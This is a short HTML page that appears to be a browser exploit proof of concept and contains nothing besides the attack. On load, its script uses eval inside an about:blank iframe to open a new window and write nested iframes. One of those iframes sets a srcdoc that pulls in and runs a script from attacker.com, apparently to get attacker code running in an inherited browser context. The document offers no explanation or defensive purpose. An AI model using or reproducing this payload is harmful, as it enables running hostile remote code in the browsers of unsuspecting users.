<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGdTXkWGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGdTXkWGGGGG.onload=_=>GGGGGdTXkWGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGdTXkWGGG src=about:blank><\/iframe><script>GGGdTXkWGGG.addEventListener(\x22load\x22,()=>{GGGdTXkWGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');");GGGGGdTXkWGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>